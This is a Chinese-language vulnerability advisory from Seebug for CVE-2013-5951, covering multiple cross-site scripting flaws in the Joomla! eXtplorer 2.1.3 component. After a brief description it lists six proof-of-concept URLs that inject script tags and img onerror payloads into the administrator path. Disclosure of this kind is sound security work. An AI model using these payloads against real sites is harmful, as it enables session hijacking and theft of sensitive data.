Joomla! eXtplorer组件多个跨站脚本漏洞

2014-03-19T00:00:00
ID SSV:61856
Type seebug
Reporter Root
Modified 2014-03-19T00:00:00

Description

CVE ID:CVE-2013-5951

Joomla!是一套在国外相当知名的内容管理系统。

Joomla! eXtplorer组件多个脚本不正确过滤用户提交的输入,允许远程攻击者利用漏洞进行跨站脚本攻击,可获取敏感信息或劫持用户会话。 0 Joomla! eXtplorer 2.1.3 目前没有详细解决方案提供: http://www.joomla.org/

                                        
                                            
                                                http://www.example.com/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component 
http://www.example.com/administrator/index.php<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=post&do_action=admin 
http://www.example.com/administrator/index.php/<img src=x onerror=alert('XSS') >?option=com_extplorer&tmpl=component&action=post&do_action=copy 
http://www.example.com/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component 
http://www.example.com/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component 
http://www.example.com/administrator/index.php/<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=upload